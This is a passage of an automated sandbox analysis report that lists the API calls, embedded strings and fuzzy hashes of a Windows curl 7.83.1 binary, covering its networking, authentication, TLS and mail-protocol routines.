                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2161B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21638
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21655
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21672
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2168F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E216AC
                                      • Part of subcall function 00E15D80: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E15D9B
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    APIs
                                    • WSASetLastError.WS2_32(00002726,00000000,00000000,00000000), ref: 00E2F506
                                    • __aulldvrm.LIBCMT ref: 00E2F55C
                                    • select.WS2_32(00000100,?,?,?,?), ref: 00E2F5E9
                                    • __WSAFDIsSet.WS2_32(000000FF,?), ref: 00E2F623
                                    • __WSAFDIsSet.WS2_32(000000FF,?), ref: 00E2F65B
                                    • __WSAFDIsSet.WS2_32(000000FF,?), ref: 00E2F679
                                    Similarity
                                    • API ID: ErrorLast__aulldvrmselect
                                    • String ID:
                                    • API String ID: 1566158641-0
                                    APIs
                                      • Part of subcall function 00E4ADF2: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000,HTTP,?,?), ref: 00E4AE0A
                                      • Part of subcall function 00E4ADF2: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4AE21
                                      • Part of subcall function 00E4ADF2: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E4AE3D
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0000000A,?,?,?,?,?,?,?,?,?,?,?,00E4B2F1,?), ref: 00E4FBFD
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0000000A,?,?,?,?,?,?,?,?,?,?,?,00E4B2F1,?), ref: 00E4FC53
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00E4B2F1,?,?,?,00000000), ref: 00E4FCA7
                                    Strings
                                    Similarity
                                    • API ID: callocfree$_strdupmalloc
                                    • String ID: GSSAPI handshake failure (empty challenge message)$Kerberos$SSPI: couldn't get auth info
                                    • API String ID: 3060414022-4232989830
                                    APIs
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E24EE0
                                    Strings
                                    • Failed to resolve host '%s' with timeout after %ld ms, xrefs: 00E25016
                                    • Could not resolve host: %s, xrefs: 00E2504D
                                    • Couldn't resolve proxy '%s', xrefs: 00E250E9
                                    • Unix socket path too long: '%s', xrefs: 00E24F20
                                    Similarity
                                    • API ID: calloc
                                    • String ID: Could not resolve host: %s$Couldn't resolve proxy '%s'$Failed to resolve host '%s' with timeout after %ld ms$Unix socket path too long: '%s'
                                    • API String ID: 2635317215-2215122109
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2BEFF
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2BF35
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2C00C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2C161
                                      • Part of subcall function 00E1A7F6: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000), ref: 00E1A80D
                                    Strings
                                    Similarity
                                    • API ID: free
                                    • String ID: No URL set$User-Agent: %s
                                    • API String ID: 1294909896-339178133
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E462F0
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4632C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E46356
                                    Strings
                                    • schannel: shutting down SSL/TLS connection with %s port %hu, xrefs: 00E46118
                                    • schannel: failed to send close msg: %s (bytes written: %zd), xrefs: 00E462AE
                                    • schannel: ApplyControlToken failure: %s, xrefs: 00E461B9
                                    Similarity
                                    • API ID: free
                                    • String ID: schannel: ApplyControlToken failure: %s$schannel: failed to send close msg: %s (bytes written: %zd)$schannel: shutting down SSL/TLS connection with %s port %hu
                                    • API String ID: 1294909896-1242988243
                                    Strings
                                    Similarity
                                    • API ID:
                                    • String ID: AAAA$Could not DoH-resolve: %s$DoH Host name: %s$DoH: %s type %s for %s$bad error code
                                    • API String ID: 0-4260076447
                                    APIs
                                      • Part of subcall function 00E4AB9A: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E29633,00000000), ref: 00E4ABCC
                                      • Part of subcall function 00E4AB9A: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E29633,00000000), ref: 00E4ABFD
                                      • Part of subcall function 00E4AB9A: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E29633,00000000), ref: 00E4AC1F
                                      • Part of subcall function 00E4AB9A: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4AC36
                                      • Part of subcall function 00E4AB9A: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4AC50
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,y,00E40F4D,?,?,y,?,?,00000000,?,?,?,00E30B5D), ref: 00E4A8FF
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,y,00E40F4D,?,?,y,?,?,00000000,?,?,?,00E30B5D,?), ref: 00E4A94A
                                    Strings
                                    Similarity
                                    • API ID: free$callocmalloc
                                    • String ID: NTLM$SSPI: couldn't get auth info$y
                                    • API String ID: 1437353635-2588018048
                                    APIs
                                      • Part of subcall function 00E15DA0: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00E233F9), ref: 00E15DB7
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E31FCD
                                    Strings
                                    Similarity
                                    • API ID: callocfree
                                    • String ID: ;type=$;type=%c$?%s$ftp$http
                                    • API String ID: 306872129-3547414
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,000009B8,?,?,00E30F95,?,?,00000000,?), ref: 00E40C78
                                    Strings
                                    • NTLM handshake failure (empty type-2 message), xrefs: 00E40C52
                                    • NTLM handshake rejected, xrefs: 00E40CF3
                                    • NTLM auth restarted, xrefs: 00E40C10
                                    • NTLM handshake failure (internal error), xrefs: 00E40D1C
                                    • NTLM, xrefs: 00E40BD1
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: malloc
                                    • String ID: NTLM$NTLM auth restarted$NTLM handshake failure (empty type-2 message)$NTLM handshake failure (internal error)$NTLM handshake rejected
                                    Strings
                                    • Mime-Version: 1.0, xrefs: 00E41771
                                    • Cannot APPEND with unknown input file size, xrefs: 00E417CF
                                    • Cannot APPEND without a mailbox., xrefs: 00E41701
                                    • APPEND %s (\Seen) {%I64d}, xrefs: 00E4180B
                                    • Mime-Version, xrefs: 00E4175A
                                    Similarity
                                    • API ID:
                                    • String ID: APPEND %s (\Seen) {%I64d}$Cannot APPEND with unknown input file size$Cannot APPEND without a mailbox.$Mime-Version$Mime-Version: 1.0
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,?), ref: 00E305B5
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,?,?,?), ref: 00E305F1
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,?), ref: 00E30612
                                    Strings
                                    Similarity
                                    • API ID: free
                                    • String ID: %s:%s$%sAuthorization: Basic %s$Proxy-
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3CDAE
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3CE26
                                    Strings
                                    Similarity
                                    • API ID: freemalloc
                                    • String ID: OS/400$SITE NAMEFMT 1
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?), ref: 00E0EE54
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E0EE65
                                    Strings
                                    Similarity
                                    • API ID: free
                                    • String ID: curl_slist_free_all(slist%d);$slist%d = NULL;$slist%d = curl_slist_append(slist%d, "%s");$struct curl_slist *slist%d;
                                    APIs
                                    • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E23B8B
                                    Strings
                                    Similarity
                                    • API ID: tolower
                                    • String ID: ALL_PROXY$Uses proxy env variable %s == '%s'$_proxy$all_proxy$http_proxy
                                    APIs
                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,00000000,00000001,000009C9,000009C9,?,00E21E86,?,?,00000000), ref: 00E28B1D
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00E21E86,?,?,00000000), ref: 00E28B30
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,00E21E86,?,?,00000000), ref: 00E28B3C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E21E86,?,?,00000000), ref: 00E28B69
                                    • closesocket.WS2_32(00E21E86), ref: 00E28B7A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E28B94
                                    Similarity
                                    • API ID: CriticalSectionfree$CloseEnterHandleLeaveclosesocket
                                    • String ID:
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2B8C8
                                    • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00E2B9D9
                                    • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 00E2B9F4
                                    Strings
                                    • Failed to alloc scratch buffer, xrefs: 00E2B8D5
                                    • We are completely uploaded and fine, xrefs: 00E2BAC3
                                    Similarity
                                    • API ID: Ioctlmallocsetsockopt
                                    • String ID: Failed to alloc scratch buffer$We are completely uploaded and fine
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4589A
                                    • WSAGetLastError.WS2_32 ref: 00E45A16
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E45A73
                                    Strings
                                    • select/poll on SSL socket, errno: %d, xrefs: 00E45A1D
                                    • schannel: timed out sending data (bytes sent: %zd), xrefs: 00E45A34
                                    Similarity
                                    • API ID: ErrorLastfreemalloc
                                    • String ID: schannel: timed out sending data (bytes sent: %zd)$select/poll on SSL socket, errno: %d
                                    APIs
                                    • isupper.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,00000000,?), ref: 00E4DE6E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00E4E5FF,?,00000000), ref: 00E4DED6
                                    Strings
                                    Similarity
                                    • API ID: freeisupper
                                    • String ID: 0)$dO
                                    APIs
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00E0D618
                                    • strtok.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00E607BC), ref: 00E0D631
                                    • strtok.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00E607BC), ref: 00E0D6C9
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E0D715
                                    Strings
                                    • unrecognized protocol '%s', xrefs: 00E0D6AF
                                    Similarity
                                    • API ID: strtok$_strdupfree
                                    • String ID: unrecognized protocol '%s'
                                    APIs
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000), ref: 00E35305
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3533E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E3535A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E35391
                                    Strings
                                    Similarity
                                    • API ID: free$_strdup
                                    • String ID: realm
                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E37629
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E3766C
                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(-000001F4,-000001F4,?,000003E8,00000000), ref: 00E3769F
                                    Strings
                                    • Connection time-out, xrefs: 00E375F6
                                    • set timeouts for state %d; Total % I64d, retry %d maxtry %d, xrefs: 00E3768B
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$_time64
                                    • String ID: Connection time-out$set timeouts for state %d; Total % I64d, retry %d maxtry %d
                                    APIs
                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(00000022,00000000,00000000,00000000,?,?,00E109E5,00000000,?,00E107A5,?,?), ref: 00E10896
                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000,00E109E5,00000000), ref: 00E108FD
                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(00E61D90,00000000,00E109E5,00000000,?,00E107A5,?,?), ref: 00E1093B
                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(00000022,00000000,?,?), ref: 00E1094F
                                    Strings
                                    Similarity
                                    • API ID: fputc$fputs
                                    • String ID: u%04x
                                    APIs
                                    • getsockname.WS2_32(?,?,?), ref: 00E3A14D
                                    • accept.WS2_32(?,?,00000080), ref: 00E3A175
                                    • ioctlsocket.WS2_32(?,8004667E,?), ref: 00E3A1D8
                                    Strings
                                    • Connection accepted from server, xrefs: 00E3A1A7
                                    • Error accept()ing server connect, xrefs: 00E3A192
                                    Similarity
                                    • API ID: acceptgetsocknameioctlsocket
                                    • String ID: Connection accepted from server$Error accept()ing server connect
                                    • API String ID: 36920154-1795061160
                                    APIs
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E39557
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E39584
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E395A3
                                    Strings
                                    Similarity
                                    • API ID: ___from_strstr_to_strchrcallocfree
                                    • String ID: +$Got unexpected pop3-server response
                                    • API String ID: 1802162112-3277052657
                                    APIs
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00E2E982,00000000,?,?,?,00E2EB73), ref: 00E2E849
                                    • htons.WS2_32(?), ref: 00E2E85B
                                    • inet_pton.WS2_32(00000017,::1,?), ref: 00E2E877
                                    Strings
                                    Similarity
                                    • API ID: callochtonsinet_pton
                                    • String ID: ::1$localhost
                                    • API String ID: 4237634067-466958357
                                    APIs
                                    • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 00E2333A
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E2336C
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E233AA
                                    Strings
                                    Similarity
                                    • API ID: _errnofreestrtoul
                                    • String ID: 0kv@qv@/lv$Invalid zoneid: %s; %s
                                    • API String ID: 3069384960-3758071802
                                    APIs
                                    • htons.WS2_32(?), ref: 00E2E8FF
                                    • inet_pton.WS2_32(00000002,127.0.0.1,?), ref: 00E2E913
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,?,00E2EB73,?,?,?), ref: 00E2E937
                                      • Part of subcall function 00E2E822: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00E2E982,00000000,?,?,?,00E2EB73), ref: 00E2E849
                                      • Part of subcall function 00E2E822: htons.WS2_32(?), ref: 00E2E85B
                                      • Part of subcall function 00E2E822: inet_pton.WS2_32(00000017,::1,?), ref: 00E2E877
                                    Strings
                                    Similarity
                                    • API ID: callochtonsinet_pton
                                    • String ID: 127.0.0.1$localhost
                                    • API String ID: 4237634067-2339935011
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E07F43
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E07F5F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E07F89
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E07FA5
                                    Strings
                                    Similarity
                                    • API ID: _strdupfree
                                    • String ID: a
                                    • API String ID: 1865132094-3904355907
                                    APIs
                                    • setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 00E1DCE2
                                    • WSAIoctl.WS2_32(?,98000004,00000001,0000000C,00000000,00000000,?,00000000,00000000), ref: 00E1DD3E
                                    • WSAGetLastError.WS2_32(?,98000004,00000001,0000000C,00000000,00000000,?,00000000,00000000,?,0000FFFF,00000008,?,00000004), ref: 00E1DD48
                                    Strings
                                    • Failed to set SO_KEEPALIVE on fd %d, xrefs: 00E1DCED
                                    • Failed to set SIO_KEEPALIVE_VALS on fd %d: %d, xrefs: 00E1DD50
                                    Similarity
                                    • API ID: ErrorIoctlLastsetsockopt
                                    • String ID: Failed to set SIO_KEEPALIVE_VALS on fd %d: %d$Failed to set SO_KEEPALIVE on fd %d
                                    • API String ID: 1819429192-3022933585
                                    APIs
                                    • GetModuleFileNameA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,00E6F580,00000200,.curlrc,00000000,00000000,.curlrc,?,00E0DC8B,?,00000000,00000000), ref: 00E0DB9B
                                    • _strrchr.LIBCMT ref: 00E0DBAC
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00E6F580,00E57A20,00000000,00000200,%s%s,00E5734C,.curlrc,?,00E0DC8B,?,00000000,00000000), ref: 00E0DC03
                                    Strings
                                    Similarity
                                    • API ID: FileModuleName_strrchrfopen
                                    • String ID: %s%s$.curlrc
                                    • API String ID: 494197015-3900187666
                                    APIs
                                    • puts.API-MS-WIN-CRT-STDIO-L1-1-0(Build-time engines:), ref: 00E08BAB
                                    • puts.API-MS-WIN-CRT-STDIO-L1-1-0( <none>), ref: 00E08BDB
                                      • Part of subcall function 00E120F5: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,?,?,00E08A7A,curl 7.83.1 (Windows) %s,00000000), ref: 00E12101
                                    Strings
                                    Similarity
                                    • API ID: puts$__acrt_iob_func
                                    • String ID: %s$ <none>$Build-time engines:
                                    • API String ID: 1292152210-2903797034
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 00E4C3E2
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 00E4C5B5
                                    Strings
                                    • response reading failed, xrefs: 00E4C441
                                    • Excessive server response line length received, %zd bytes. Stripping, xrefs: 00E4C525
                                    • cached response data too big to handle, xrefs: 00E4C5EC
                                    Similarity
                                    • API ID: freemalloc
                                    • String ID: Excessive server response line length received, %zd bytes. Stripping$cached response data too big to handle$response reading failed
                                    • API String ID: 3061335427-1004035239
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E16F9B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E16FB9
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E170AA
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E17229
                                    Strings
                                    • Connection #%ld to host %s left intact, xrefs: 00E17182
                                    Similarity
                                    • API ID: free
                                    • String ID: Connection #%ld to host %s left intact
                                    • API String ID: 1294909896-3505918467
                                    APIs
                                      • Part of subcall function 00E109FA: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 00E10A07
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E41DC6
                                    Strings
                                    • *, xrefs: 00E41C60
                                    • Failed to parse FETCH response., xrefs: 00E41CA0
                                    • Found %I64d bytes to download, xrefs: 00E41D02
                                    • Written %zu bytes, %I64u bytes are left for transfer, xrefs: 00E41D7B
                                    Similarity
                                    • API ID: _errnofree
                                    • String ID: *$Failed to parse FETCH response.$Found %I64d bytes to download$Written %zu bytes, %I64u bytes are left for transfer
                                    • API String ID: 1830139605-1126424615
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E30591,00000001,00000000,00000000,00000000,?,?,?), ref: 00E46847
                                    Strings
                                    Similarity
                                    • API ID: malloc
                                    • String ID: %c%c%c%c$%c%c%c=$%c%c==$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
                                    • API String ID: 2803490479-989668499
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,00000000,00000000), ref: 00E2E61D
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 00E2E657
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,00000000), ref: 00E2E6F0
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,00000000), ref: 00E2E70A
                                    Strings
                                    Similarity
                                    • API ID: freemalloc
                                    • String ID: Shuffling %i addresses
                                    • API String ID: 3061335427-3589116693
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0FD9E
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000B08), ref: 00E0FDBD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E0FDCC
                                    Strings
                                    Similarity
                                    • API ID: callocfreemalloc
                                    • String ID: %s in URL position %zu:%s%*s^$curl: (%d) %s
                                    • API String ID: 4086611775-2317922172
                                    APIs
                                    • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00E6FA10,?), ref: 00E27E88
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: strncpy
                                    • String ID: %s%s%s%s$<{$xk$xk
                                    • API String ID: 3301158039-1040737488
                                    • Opcode ID: 8291d0e1cda83f60afcd766506466846b8043ca0ac00f53657c3980b8e5d3f2d
                                    • Instruction ID: 9979ca3c071d3861ad0323b3104610b4237fa155f4f6715f9e2fe0bc02076166
                                    • Opcode Fuzzy Hash: 8291d0e1cda83f60afcd766506466846b8043ca0ac00f53657c3980b8e5d3f2d
                                    • Instruction Fuzzy Hash: 0E41DF71A042298FDB14CB59FC81BAABBA5EB84344F1495FEE849F3241C6709D488FB0
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3E0B6
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3E0D4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3E0EE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID: Failure sending QUIT command: %s$QUIT
                                    • API String ID: 1294909896-1162443993
                                    • Opcode ID: cf96727439e249c884f2ba29af19895991a7dbe5ff134348e3954dbe2f02fde9
                                    • Instruction ID: d173e0b11e2e5c3d4d435740254903f83d8f05df09725e8482028fff8e180cd7
                                    • Opcode Fuzzy Hash: cf96727439e249c884f2ba29af19895991a7dbe5ff134348e3954dbe2f02fde9
                                    • Instruction Fuzzy Hash: 1E31E6717087019FDB189F39A8887A6BBD5BF44314F04517AE80DB7392DBF5A844CB91
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E06762
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E06790
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(10000000), ref: 00E067A9
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E067D1
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(01000000), ref: 00E067EA
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _strdupfree$___from_strstr_to_strchr
                                    • String ID:
                                    • API String ID: 104559748-0
                                    • Opcode ID: 966f63ad556a34b377b5e84f2fb642c6b75c44db7a3bf56be5acd5688437d2dc
                                    • Instruction ID: b78f36b4eb1383b4c02a626c85a32814321a8660d3562f6aa13c167c9ed7f73a
                                    • Opcode Fuzzy Hash: 966f63ad556a34b377b5e84f2fb642c6b75c44db7a3bf56be5acd5688437d2dc
                                    • Instruction Fuzzy Hash: 4F3189315087418FC325CF2894547ABBBF1AF85318F282E5EE0D6B75D1DB21E88ACB41
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E415B1
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E415CF
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E41629
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID: Cannot SELECT without a mailbox.$SELECT %s
                                    • API String ID: 1294909896-2454231232
                                    • Opcode ID: 4e21800ab0f8e6d8e7c99719b7c40d85ceaa98c9f5f22f235fb320e3d79b3a4e
                                    • Instruction ID: f907f8d18814febcd06718fd78828dbb9cf5f0ecc4bd52e16804753a0991f959
                                    • Opcode Fuzzy Hash: 4e21800ab0f8e6d8e7c99719b7c40d85ceaa98c9f5f22f235fb320e3d79b3a4e
                                    • Instruction Fuzzy Hash: 88110432700215EFDB049F15FC45BADB7A8FF84365F1540AAE905B72A1DBB4AC048BD4
                                    APIs
                                      • Part of subcall function 00E121C0: FreeLibrary.KERNELBASE(00000000,?,00E08EF6), ref: 00E12208
                                      • Part of subcall function 00E121C0: WSACleanup.WS2_32 ref: 00E12227
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E08EF9
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E08F13
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E08F2B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E08F38
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E08F57
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
